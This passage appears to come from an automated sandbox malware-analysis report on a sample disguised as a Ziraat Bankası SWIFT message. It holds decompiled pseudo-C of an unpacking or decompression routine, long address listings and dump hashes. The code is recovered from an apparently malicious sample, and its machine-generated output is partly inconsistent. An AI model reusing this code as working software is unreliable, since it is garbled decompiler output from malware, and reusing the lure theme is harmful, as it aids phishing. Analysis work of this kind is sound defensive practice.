                                  													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                  														__ecx =  *(__ebp - 0x10);
                                  														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                  														__ebx = __ebx | 0x00000001;
                                  														__eflags = __ebx;
                                  														 *(__ebp - 0x44) = __ebx;
                                  													}
                                  													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  													if( *(__ebp - 0x10) >= 0x1000000) {
                                  														L101:
                                  														_t338 = __ebp - 0x48;
                                  														 *_t338 =  *(__ebp - 0x48) - 1;
                                  														__eflags =  *_t338;
                                  														goto L102;
                                  													} else {
                                  														goto L99;
                                  													}
                                  												}
                                  												__edx =  *(__ebp - 4);
                                  												__eax = __eax - __ebx;
                                  												 *(__ebp - 0x40) = __ecx;
                                  												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                  												goto L108;
                                  											case 0x1a:
                                  												L56:
                                  												__eflags =  *(__ebp - 0x64);
                                  												if( *(__ebp - 0x64) == 0) {
                                  													 *(__ebp - 0x88) = 0x1a;
                                  													goto L170;
                                  												}
                                  												__ecx =  *(__ebp - 0x68);
                                  												__al =  *(__ebp - 0x5c);
                                  												__edx =  *(__ebp - 8);
                                  												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                  												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                  												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                  												 *( *(__ebp - 0x68)) = __al;
                                  												__ecx =  *(__ebp - 0x14);
                                  												 *(__ecx +  *(__ebp - 8)) = __al;
                                  												__eax = __ecx + 1;
                                  												__edx = 0;
                                  												_t192 = __eax %  *(__ebp - 0x74);
                                  												__eax = __eax /  *(__ebp - 0x74);
                                  												__edx = _t192;
                                  												goto L80;
                                  											case 0x1b:
                                  												L76:
                                  												__eflags =  *(__ebp - 0x64);
                                  												if( *(__ebp - 0x64) == 0) {
                                  													 *(__ebp - 0x88) = 0x1b;
                                  													goto L170;
                                  												}
                                  												__eax =  *(__ebp - 0x14);
                                  												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                  												__eflags = __eax -  *(__ebp - 0x74);
                                  												if(__eax >=  *(__ebp - 0x74)) {
                                  													__eax = __eax +  *(__ebp - 0x74);
                                  													__eflags = __eax;
                                  												}
                                  												__edx =  *(__ebp - 8);
                                  												__cl =  *(__eax + __edx);
                                  												__eax =  *(__ebp - 0x14);
                                  												 *(__ebp - 0x5c) = __cl;
                                  												 *(__eax + __edx) = __cl;
                                  												__eax = __eax + 1;
                                  												__edx = 0;
                                  												_t275 = __eax %  *(__ebp - 0x74);
                                  												__eax = __eax /  *(__ebp - 0x74);
                                  												__edx = _t275;
                                  												__eax =  *(__ebp - 0x68);
                                  												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                  												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                  												_t284 = __ebp - 0x64;
                                  												 *_t284 =  *(__ebp - 0x64) - 1;
                                  												__eflags =  *_t284;
                                  												 *( *(__ebp - 0x68)) = __cl;
                                  												L80:
                                  												 *(__ebp - 0x14) = __edx;
                                  												goto L81;
                                  											case 0x1c:
                                  												while(1) {
                                  													L123:
                                  													__eflags =  *(__ebp - 0x64);
                                  													if( *(__ebp - 0x64) == 0) {
                                  														break;
                                  													}
                                  													__eax =  *(__ebp - 0x14);
                                  													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                  													__eflags = __eax -  *(__ebp - 0x74);
                                  													if(__eax >=  *(__ebp - 0x74)) {
                                  														__eax = __eax +  *(__ebp - 0x74);
                                  														__eflags = __eax;
                                  													}
                                  													__edx =  *(__ebp - 8);
                                  													__cl =  *(__eax + __edx);
                                  													__eax =  *(__ebp - 0x14);
                                  													 *(__ebp - 0x5c) = __cl;
                                  													 *(__eax + __edx) = __cl;
                                  													__eax = __eax + 1;
                                  													__edx = 0;
                                  													_t414 = __eax %  *(__ebp - 0x74);
                                  													__eax = __eax /  *(__ebp - 0x74);
                                  													__edx = _t414;
                                  													__eax =  *(__ebp - 0x68);
                                  													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                  													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                  													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                  													__eflags =  *(__ebp - 0x30);
                                  													 *( *(__ebp - 0x68)) = __cl;
                                  													 *(__ebp - 0x14) = _t414;
                                  													if( *(__ebp - 0x30) > 0) {
                                  														continue;
                                  													} else {
                                  														L81:
                                  														 *(__ebp - 0x88) = 2;
                                  														goto L1;
                                  													}
                                  												}
                                  												 *(__ebp - 0x88) = 0x1c;
                                  												goto L170;
                                  										}
                                  									}
                                  									L171:
                                  									_t535 = _t534 | 0xffffffff;
                                  									goto L172;
                                  								}
                                  							}
                                  						}
                                  					}
                                  					goto L1;
                                  				}
                                  			}













                                  0x00000000
                                  0x00406409
                                  0x00406409
                                  0x0040640d
                                  0x0040641a
                                  0x00406424
                                  0x00000000
                                  0x0040640f
                                  0x0040640f
                                  0x0040644a
                                  0x0040644d
                                  0x00406450
                                  0x00406453
                                  0x00406453
                                  0x00406456
                                  0x0040645d
                                  0x00406462
                                  0x00406343
                                  0x00406346
                                  0x004066b8
                                  0x004066b8
                                  0x004066b8
                                  0x004066bb
                                  0x004066bb
                                  0x004066bb
                                  0x004066c1
                                  0x004066c7
                                  0x004066cd
                                  0x004066e7
                                  0x004066ea
                                  0x004066f0
                                  0x004066fb
                                  0x004066fd
                                  0x004066cf
                                  0x004066cf
                                  0x004066de
                                  0x004066e2
                                  0x004066e2
                                  0x00406707
                                  0x00000000
                                  0x00000000
                                  0x00406709
                                  0x0040670d
                                  0x004068bc
                                  0x004068d2
                                  0x004068da
                                  0x004068e1
                                  0x004068e3
                                  0x004068ea
                                  0x004068ee
                                  0x004068ee
                                  0x00406719
                                  0x00406720
                                  0x00406728
                                  0x0040672b
                                  0x0040672e
                                  0x0040672e
                                  0x00406734
                                  0x00406734
                                  0x00405ed0
                                  0x00405ed0
                                  0x00405ed0
                                  0x00405ed9
                                  0x00000000
                                  0x00000000
                                  0x00405edf
                                  0x00000000
                                  0x00405eea
                                  0x00000000
                                  0x00000000
                                  0x00405ef3
                                  0x00405ef6
                                  0x00405ef9
                                  0x00405efd
                                  0x00000000
                                  0x00000000
                                  0x00405f03
                                  0x00405f06
                                  0x00405f08
                                  0x00405f09
                                  0x00405f0c
                                  0x00405f0e
                                  0x00405f0f
                                  0x00405f11
                                  0x00405f14
                                  0x00405f19
                                  0x00405f1e
                                  0x00405f27
                                  0x00405f3a
                                  0x00405f3d
                                  0x00405f49
                                  0x00405f71
                                  0x00405f73
                                  0x00405f81
                                  0x00405f81
                                  0x00405f85
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00405f75
                                  0x00405f75
                                  0x00405f78
                                  0x00405f79
                                  0x00405f79
                                  0x00000000
                                  0x00405f75
                                  0x00405f4f
                                  0x00405f54
                                  0x00405f54
                                  0x00405f5d
                                  0x00405f65
                                  0x00405f68
                                  0x00000000
                                  0x00405f6e
                                  0x00405f6e
                                  0x00000000
                                  0x00405f6e
                                  0x00000000
                                  0x00405f8b
                                  0x00405f8b
                                  0x00405f8f
                                  0x0040683b
                                  0x00000000
                                  0x0040683b
                                  0x00405f98
                                  0x00405fa8
                                  0x00405fab
                                  0x00405fae
                                  0x00405fae
                                  0x00405fae
                                  0x00405fb1
                                  0x00405fb5
                                  0x00000000
                                  0x00000000
                                  0x00405fb7
                                  0x00405fbd
                                  0x00405fe7
                                  0x00405fed
                                  0x00405ff4
                                  0x00000000
                                  0x00405ff4
                                  0x00405fc3
                                  0x00405fc6
                                  0x00405fcb
                                  0x00405fcb
                                  0x00405fd6
                                  0x00405fde
                                  0x00405fe1
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406026
                                  0x0040602c
                                  0x0040602f
                                  0x0040603c
                                  0x00406044
                                  0x004066b8
                                  0x004066b8
                                  0x00000000
                                  0x00000000
                                  0x00405ffb
                                  0x00405ffb
                                  0x00405fff
                                  0x0040684a
                                  0x00000000
                                  0x0040684a
                                  0x0040600b
                                  0x00406016
                                  0x00406016
                                  0x00406016
                                  0x00406019
                                  0x0040601c
                                  0x0040601f
                                  0x00406024
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004066bb
                                  0x004066bb
                                  0x004066c1
                                  0x004066c7
                                  0x004066cd
                                  0x004066e7
                                  0x004066ea
                                  0x004066f0
                                  0x004066fb
                                  0x004066fd
                                  0x004066cf
                                  0x004066cf
                                  0x004066de
                                  0x004066e2
                                  0x004066e2
                                  0x00406707
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040604c
                                  0x0040604e
                                  0x00406051
                                  0x004060c2
                                  0x004060c5
                                  0x004060c8
                                  0x004060cf
                                  0x004060d9
                                  0x004066b8
                                  0x004066b8
                                  0x004066b8
                                  0x00000000
                                  0x004066b8
                                  0x004066b8
                                  0x00406053
                                  0x00406057
                                  0x0040605a
                                  0x0040605c
                                  0x0040605f
                                  0x00406062
                                  0x00406064
                                  0x00406067
                                  0x00406069
                                  0x0040606e
                                  0x00406071
                                  0x00406074
                                  0x00406078
                                  0x0040607f
                                  0x00406082
                                  0x00406089
                                  0x0040608d
                                  0x00406095
                                  0x00406095
                                  0x00406095
                                  0x0040608f
                                  0x0040608f
                                  0x0040608f
                                  0x00406084
                                  0x00406084
                                  0x00406084
                                  0x00406099
                                  0x0040609c
                                  0x004060ba
                                  0x004060bc
                                  0x00000000
                                  0x0040609e
                                  0x0040609e
                                  0x004060a1
                                  0x004060a4
                                  0x004060a7
                                  0x004060a9
                                  0x004060a9
                                  0x004060a9
                                  0x004060ac
                                  0x004060af
                                  0x004060b1
                                  0x004060b2
                                  0x004060b5
                                  0x00000000
                                  0x004060b5
                                  0x00000000
                                  0x004062eb
                                  0x004062ef
                                  0x0040630d
                                  0x00406310
                                  0x00406317
                                  0x0040631a
                                  0x0040631d
                                  0x00406320
                                  0x00406323
                                  0x00406326
                                  0x00406328
                                  0x0040632f
                                  0x00406330
                                  0x00406332
                                  0x00406335
                                  0x00406338
                                  0x0040633b
                                  0x0040633b
                                  0x00406340
                                  0x00000000
                                  0x00406340
                                  0x004062f1
                                  0x004062f4
                                  0x004062f7
                                  0x00406301
                                  0x004066b8
                                  0x004066b8
                                  0x004066b8
                                  0x00000000
                                  0x004066b8
                                  0x00000000
                                  0x00406355
                                  0x00406359
                                  0x0040637c
                                  0x0040637f
                                  0x00406382
                                  0x0040638c
                                  0x0040635b
                                  0x0040635b
                                  0x0040635e
                                  0x00406361
                                  0x00406364
                                  0x00406371
                                  0x00406374
                                  0x00406374
                                  0x004066b8
                                  0x004066b8
                                  0x004066b8
                                  0x00000000
                                  0x004066b8
                                  0x00000000
                                  0x00406398
                                  0x0040639c
                                  0x00000000
                                  0x00000000
                                  0x004063a2
                                  0x004063a6
                                  0x00000000
                                  0x00000000
                                  0x004063ac
                                  0x004063ae
                                  0x004063b2
                                  0x004063b2
                                  0x004063b5
                                  0x004063b9
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406430
                                  0x00406434
                                  0x0040643b
                                  0x0040643e
                                  0x00406441
                                  0x00406436
                                  0x00406436
                                  0x00406436
                                  0x00406444
                                  0x00406447
                                  0x00000000
                                  0x00000000
                                  0x004064f0
                                  0x004064f0
                                  0x004064f4
                                  0x00406892
                                  0x00000000
                                  0x00406892
                                  0x004064fa
                                  0x004064fd
                                  0x00406500
                                  0x00406504
                                  0x00406507
                                  0x0040650d
                                  0x0040650f
                                  0x0040650f
                                  0x0040650f
                                  0x00406512
                                  0x00406515
                                  0x00000000
                                  0x00000000
                                  0x004060e5
                                  0x004060e5
                                  0x004060e9
                                  0x00406856
                                  0x00000000
                                  0x00406856
                                  0x004060ef
                                  0x004060f2
                                  0x004060f5
                                  0x004060f9
                                  0x004060fc
                                  0x00406102
                                  0x00406104
                                  0x00406104
                                  0x00406104
                                  0x00406107
                                  0x0040610a
                                  0x0040610a
                                  0x0040610d
                                  0x00406110
                                  0x00000000
                                  0x00000000
                                  0x00406116
                                  0x0040611c
                                  0x00000000
                                  0x00000000
                                  0x00406122
                                  0x00406122
                                  0x00406126
                                  0x00406129
                                  0x0040612c
                                  0x0040612f
                                  0x00406132
                                  0x00406133
                                  0x00406136
                                  0x00406138
                                  0x0040613e
                                  0x00406141
                                  0x00406144
                                  0x00406147
                                  0x0040614a
                                  0x0040614d
                                  0x00406150
                                  0x0040616c
                                  0x0040616f
                                  0x00406172
                                  0x00406175
                                  0x0040617c
                                  0x00406180
                                  0x00406182
                                  0x00406186
                                  0x00406152
                                  0x00406152
                                  0x00406156
                                  0x0040615e
                                  0x00406163
                                  0x00406165
                                  0x00406167
                                  0x00406167
                                  0x00406189
                                  0x00406190
                                  0x00406193
                                  0x00000000
                                  0x00406199
                                  0x00000000
                                  0x00406199
                                  0x00000000
                                  0x0040619e
                                  0x0040619e
                                  0x004061a2
                                  0x00406862
                                  0x00000000
                                  0x00406862
                                  0x004061a8
                                  0x004061ab
                                  0x004061ae
                                  0x004061b2
                                  0x004061b5
                                  0x004061bb
                                  0x004061bd
                                  0x004061bd
                                  0x004061bd
                                  0x004061c0
                                  0x004061c3
                                  0x004061c3
                                  0x004061c3
                                  0x004061c9
                                  0x00000000
                                  0x00000000
                                  0x004061cb
                                  0x004061ce
                                  0x004061d1
                                  0x004061d4
                                  0x004061d7
                                  0x004061da
                                  0x004061dd
                                  0x004061e0
                                  0x004061e3
                                  0x004061e6
                                  0x004061e9
                                  0x00406201
                                  0x00406204
                                  0x00406207
                                  0x0040620a
                                  0x0040620a
                                  0x0040620d
                                  0x00406211
                                  0x00406213
                                  0x004061eb
                                  0x004061eb
                                  0x004061f3
                                  0x004061f8
                                  0x004061fa
                                  0x004061fc
                                  0x004061fc
                                  0x00406216
                                  0x0040621d
                                  0x00406220
                                  0x00000000
                                  0x00406222
                                  0x00000000
                                  0x00406222
                                  0x00406220
                                  0x00406227
                                  0x00406227
                                  0x00406227
                                  0x00406227
                                  0x00000000
                                  0x00000000
                                  0x00406262
                                  0x00406262
                                  0x00406266
                                  0x0040686e
                                  0x00000000
                                  0x0040686e
                                  0x0040626c
                                  0x0040626f
                                  0x00406272
                                  0x00406276
                                  0x00406279
                                  0x0040627f
                                  0x00406281
                                  0x00406281
                                  0x00406281
                                  0x00406284
                                  0x00406287
                                  0x00406287
                                  0x0040628d
                                  0x0040622b
                                  0x0040622b
                                  0x0040622e
                                  0x00000000
                                  0x0040622e
                                  0x0040628f
                                  0x0040628f
                                  0x00406292
                                  0x00406295
                                  0x00406298
                                  0x0040629b
                                  0x0040629e
                                  0x004062a1
                                  0x004062a4
                                  0x004062a7
                                  0x004062aa
                                  0x004062ad
                                  0x004062c5
                                  0x004062c8
                                  0x004062cb
                                  0x004062ce
                                  0x004062ce
                                  0x004062d1
                                  0x004062d5
                                  0x004062d7
                                  0x004062af
                                  0x004062af
                                  0x004062b7
                                  0x004062bc
                                  0x004062be
                                  0x004062c0
                                  0x004062c0
                                  0x004062da
                                  0x004062e1
                                  0x004062e4
                                  0x00000000
                                  0x004062e6
                                  0x00000000
                                  0x004062e6
                                  0x00000000
                                  0x00406573
                                  0x00406573
                                  0x00406577
                                  0x0040689e
                                  0x00000000
                                  0x0040689e
                                  0x0040657d
                                  0x00406580
                                  0x00406583
                                  0x00406587
                                  0x0040658a
                                  0x00406590
                                  0x00406592
                                  0x00406592
                                  0x00406592
                                  0x00406595
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406682
                                  0x00406686
                                  0x004066a8
                                  0x004066ab
                                  0x004066b5
                                  0x004066b8
                                  0x004066b8
                                  0x004066b8
                                  0x00000000
                                  0x004066b8
                                  0x004066b8
                                  0x00406688
                                  0x0040668b
                                  0x0040668f
                                  0x00406692
                                  0x00406692
                                  0x00406695
                                  0x00000000
                                  0x00000000
                                  0x0040673f
                                  0x00406743
                                  0x00406761
                                  0x00406761
                                  0x00406761
                                  0x00406768
                                  0x0040676f
                                  0x00406776
                                  0x00406776
                                  0x00000000
                                  0x00406776
                                  0x00406745
                                  0x00406748
                                  0x0040674b
                                  0x0040674e
                                  0x00406755
                                  0x00406699
                                  0x00406699
                                  0x0040669c
                                  0x00000000
                                  0x00000000
                                  0x00406830
                                  0x00406833
                                  0x00406734
                                  0x00000000
                                  0x00000000
                                  0x0040646a
                                  0x0040646c
                                  0x00406473
                                  0x00406474
                                  0x00406476
                                  0x00406479
                                  0x00000000
                                  0x00000000
                                  0x00406481
                                  0x00406484
                                  0x00406487
                                  0x00406489
                                  0x0040648b
                                  0x0040648b
                                  0x0040648c
                                  0x0040648f
                                  0x00406496
                                  0x00406499
                                  0x004064a7
                                  0x00000000
                                  0x00000000
                                  0x0040677d
                                  0x0040677d
                                  0x00406780
                                  0x00406787
                                  0x00000000
                                  0x00000000
                                  0x0040678c
                                  0x0040678c
                                  0x00406790
                                  0x004068c8
                                  0x00000000
                                  0x004068c8
                                  0x00406796
                                  0x00406799
                                  0x0040679c
                                  0x004067a0
                                  0x004067a3
                                  0x004067a9
                                  0x004067ab
                                  0x004067ab
                                  0x004067ab
                                  0x004067ae
                                  0x004067b1
                                  0x004067b1
                                  0x004067b1
                                  0x004067b1
                                  0x004067b4
                                  0x004067b4
                                  0x004067b8
                                  0x00406818
                                  0x0040681b
                                  0x00406820
                                  0x00406821
                                  0x00406823
                                  0x00406825
                                  0x00406828
                                  0x00406734
                                  0x00406734
                                  0x00000000
                                  0x0040673a
                                  0x00406734
                                  0x004067ba
                                  0x004067c0
                                  0x004067c3
                                  0x004067c6
                                  0x004067c9
                                  0x004067cc
                                  0x004067cf
                                  0x004067d2
                                  0x004067d5
                                  0x004067d8
                                  0x004067db
                                  0x004067f4
                                  0x004067f7
                                  0x004067fa
                                  0x004067fd
                                  0x00406801
                                  0x00406803
                                  0x00406803
                                  0x00406804
                                  0x00406807
                                  0x004067dd
                                  0x004067dd
                                  0x004067e5
                                  0x004067ea
                                  0x004067ec
                                  0x004067ef
                                  0x004067ef
                                  0x0040680a
                                  0x00406811
                                  0x00000000
                                  0x00406813
                                  0x00000000
                                  0x00406813
                                  0x00000000
                                  0x004064af
                                  0x004064b2
                                  0x004064e8
                                  0x00406618
                                  0x00406618
                                  0x00406618
                                  0x00406618
                                  0x0040661b
                                  0x0040661b
                                  0x0040661e
                                  0x00406620
                                  0x004068aa
                                  0x00000000
                                  0x004068aa
                                  0x00406626
                                  0x00406629
                                  0x00000000
                                  0x00000000
                                  0x0040662f
                                  0x00406633
                                  0x00406636
                                  0x00406636
                                  0x00406636
                                  0x00000000
                                  0x00406636
                                  0x004064b4
                                  0x004064b6
                                  0x004064b8
                                  0x004064ba
                                  0x004064bd
                                  0x004064be
                                  0x004064c0
                                  0x004064c2
                                  0x004064c5
                                  0x004064c8
                                  0x004064de
                                  0x004064e3
                                  0x0040651b
                                  0x0040651b
                                  0x0040651f
                                  0x0040654b
                                  0x0040654d
                                  0x00406554
                                  0x00406557
                                  0x0040655a
                                  0x0040655a
                                  0x0040655f
                                  0x0040655f
                                  0x00406561
                                  0x00406564
                                  0x0040656b
                                  0x0040656e
                                  0x0040659b
                                  0x0040659b
                                  0x0040659e
                                  0x004065a1
                                  0x00406615
                                  0x00406615
                                  0x00406615
                                  0x00000000
                                  0x00406615
                                  0x004065a3
                                  0x004065a9
                                  0x004065ac
                                  0x004065af
                                  0x004065b2
                                  0x004065b5
                                  0x004065b8
                                  0x004065bb
                                  0x004065be
                                  0x004065c1
                                  0x004065c4
                                  0x004065dd
                                  0x004065df
                                  0x004065e2
                                  0x004065e3
                                  0x004065e6
                                  0x004065e8
                                  0x004065eb
                                  0x004065ed
                                  0x004065ef
                                  0x004065f2
                                  0x004065f4
                                  0x004065f7
                                  0x004065fb
                                  0x004065fd
                                  0x004065fd
                                  0x004065fe
                                  0x00406601
                                  0x00406604
                                  0x004065c6
                                  0x004065c6
                                  0x004065ce
                                  0x004065d3
                                  0x004065d5
                                  0x004065d8
                                  0x004065d8
                                  0x00406607
                                  0x0040660e
                                  0x00406598
                                  0x00406598
                                  0x00406598
                                  0x00406598
                                  0x00000000
                                  0x00406610
                                  0x00000000
                                  0x00406610
                                  0x0040660e
                                  0x00406521
                                  0x00406524
                                  0x00406526
                                  0x00406529
                                  0x0040652c
                                  0x0040652f
                                  0x00406531
                                  0x00406534
                                  0x00406537
                                  0x00406537
                                  0x0040653a
                                  0x0040653a
                                  0x0040653d
                                  0x00406544
                                  0x00406518
                                  0x00406518
                                  0x00406518
                                  0x00406518
                                  0x00000000
                                  0x00406546
                                  0x00000000
                                  0x00406546
                                  0x00406544
                                  0x004064ca
                                  0x004064cd
                                  0x004064cf
                                  0x004064d2
                                  0x00000000
                                  0x00000000
                                  0x00406231
                                  0x00406231
                                  0x00406235
                                  0x0040687a
                                  0x00000000
                                  0x0040687a
                                  0x0040623b
                                  0x0040623e
                                  0x00406241
                                  0x00406244
                                  0x00406247
                                  0x0040624a
                                  0x0040624d
                                  0x0040624f
                                  0x00406252
                                  0x00406255
                                  0x00406258
                                  0x0040625a
                                  0x0040625a
                                  0x0040625a
                                  0x00000000
                                  0x00000000
                                  0x004063bc
                                  0x004063bc
                                  0x004063c0
                                  0x00406886
                                  0x00000000
                                  0x00406886
                                  0x004063c6
                                  0x004063c9
                                  0x004063cc
                                  0x004063cf
                                  0x004063d1
                                  0x004063d1
                                  0x004063d1
                                  0x004063d4
                                  0x004063d7
                                  0x004063da
                                  0x004063dd
                                  0x004063e0
                                  0x004063e3
                                  0x004063e4
                                  0x004063e6
                                  0x004063e6
                                  0x004063e6
                                  0x004063e9
                                  0x004063ec
                                  0x004063ef
                                  0x004063f2
                                  0x004063f2
                                  0x004063f2
                                  0x004063f5
                                  0x004063f7
                                  0x004063f7
                                  0x00000000
                                  0x00000000
                                  0x00406639
                                  0x00406639
                                  0x00406639
                                  0x0040663d
                                  0x00000000
                                  0x00000000
                                  0x00406643
                                  0x00406646
                                  0x00406649
                                  0x0040664c
                                  0x0040664e
                                  0x0040664e
                                  0x0040664e
                                  0x00406651
                                  0x00406654
                                  0x00406657
                                  0x0040665a
                                  0x0040665d
                                  0x00406660
                                  0x00406661
                                  0x00406663
                                  0x00406663
                                  0x00406663
                                  0x00406666
                                  0x00406669
                                  0x0040666c
                                  0x0040666f
                                  0x00406672
                                  0x00406676
                                  0x00406678
                                  0x0040667b
                                  0x00000000
                                  0x0040667d
                                  0x004063fa
                                  0x004063fa
                                  0x00000000
                                  0x004063fa
                                  0x0040667b
                                  0x004068b0
                                  0x00000000
                                  0x00000000
                                  0x00405edf
                                  0x004068e7
                                  0x004068e7
                                  0x00000000
                                  0x004068e7
                                  0x00406734
                                  0x004066bb
                                  0x004066b8
                                  0x00000000
                                  0x0040640d

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 26fed0205269c67c4524460d7550c555d61838a406f219378ffc8409cc06287b
                                  • Instruction ID: b59dca7a73cfed8a049a6b6a8b4acb584d685fa01604791ee1d6e054a78b3619
                                  • Opcode Fuzzy Hash: 26fed0205269c67c4524460d7550c555d61838a406f219378ffc8409cc06287b
                                  • Instruction Fuzzy Hash: 08714671D04229CFEF28CF98C844BADBBB1FB44305F15816AD816BB281C7789996DF54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 98%
                                  			E00406355() {
                                  				unsigned short _t531;
                                  				signed int _t532;
                                  				void _t533;
                                  				signed int _t534;
                                  				signed int _t535;
                                  				signed int _t565;
                                  				signed int _t568;
                                  				signed int _t589;
                                  				signed int* _t606;
                                  				void* _t613;
                                  
                                  				L0:
                                  				while(1) {
                                  					L0:
                                  					if( *(_t613 - 0x40) != 0) {
                                  						 *(_t613 - 0x84) = 0xa;
                                  						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
                                  					} else {
                                  						 *(__ebp - 0x84) = 9;
                                  						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                  					}
                                  					while(1) {
                                  						 *(_t613 - 0x54) = _t606;
                                  						while(1) {
                                  							L133:
                                  							_t531 =  *_t606;
                                  							_t589 = _t531 & 0x0000ffff;
                                  							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                  							if( *(_t613 - 0xc) >= _t565) {
                                  								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                  								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                  								 *(_t613 - 0x40) = 1;
                                  								_t532 = _t531 - (_t531 >> 5);
                                  								 *_t606 = _t532;
                                  							} else {
                                  								 *(_t613 - 0x10) = _t565;
                                  								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                  								 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                  							}
                                  							if( *(_t613 - 0x10) >= 0x1000000) {
                                  								goto L139;
                                  							}
                                  							L137:
                                  							if( *(_t613 - 0x6c) == 0) {
                                  								 *(_t613 - 0x88) = 5;
                                  								L170:
                                  								_t568 = 0x22;
                                  								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                  								_t535 = 0;
                                  								L172:
                                  								return _t535;
                                  							}
                                  							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                  							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                  							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                  							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                  							L139:
                                  							_t533 =  *(_t613 - 0x84);
                                  							while(1) {
                                  								 *(_t613 - 0x88) = _t533;
                                  								while(1) {
                                  									L1:
                                  									_t534 =  *(_t613 - 0x88);
                                  									if(_t534 > 0x1c) {
                                  										break;
                                  									}
                                  									switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
                                  										case 0:
                                  											if( *(_t613 - 0x6c) == 0) {
                                  												goto L170;
                                  											}
                                  											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                  											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                  											_t534 =  *( *(_t613 - 0x70));
                                  											if(_t534 > 0xe1) {
                                  												goto L171;
                                  											}
                                  											_t538 = _t534 & 0x000000ff;
                                  											_push(0x2d);
                                  											asm("cdq");
                                  											_pop(_t570);
                                  											_push(9);
                                  											_pop(_t571);
                                  											_t609 = _t538 / _t570;
                                  											_t540 = _t538 % _t570 & 0x000000ff;
                                  											asm("cdq");
                                  											_t604 = _t540 % _t571 & 0x000000ff;
                                  											 *(_t613 - 0x3c) = _t604;
                                  											 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                  											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                  											_t612 = (0x300 << _t604 + _t609) + 0x736;
                                  											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                  												L10:
                                  												if(_t612 == 0) {
                                  													L12:
                                  													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                  													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                  													goto L15;
                                  												} else {
                                  													goto L11;
                                  												}
                                  												do {
                                  													L11:
                                  													_t612 = _t612 - 1;
                                  													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                  												} while (_t612 != 0);
                                  												goto L12;
                                  											}
                                  											if( *(_t613 - 4) != 0) {
                                  												GlobalFree( *(_t613 - 4));
                                  											}
                                  											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                  											 *(_t613 - 4) = _t534;
                                  											if(_t534 == 0) {
                                  												goto L171;
                                  											} else {
                                  												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                  												goto L10;
                                  											}
                                  										case 1:
                                  											L13:
                                  											__eflags =  *(_t613 - 0x6c);
                                  											if( *(_t613 - 0x6c) == 0) {
                                  												 *(_t613 - 0x88) = 1;
                                  												goto L170;
                                  											}
                                  											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                  											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                  											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                  											_t45 = _t613 - 0x48;
                                  											 *_t45 =  *(_t613 - 0x48) + 1;
                                  											__eflags =  *_t45;
                                  											L15:
                                  											if( *(_t613 - 0x48) < 4) {
                                  												goto L13;
                                  											}
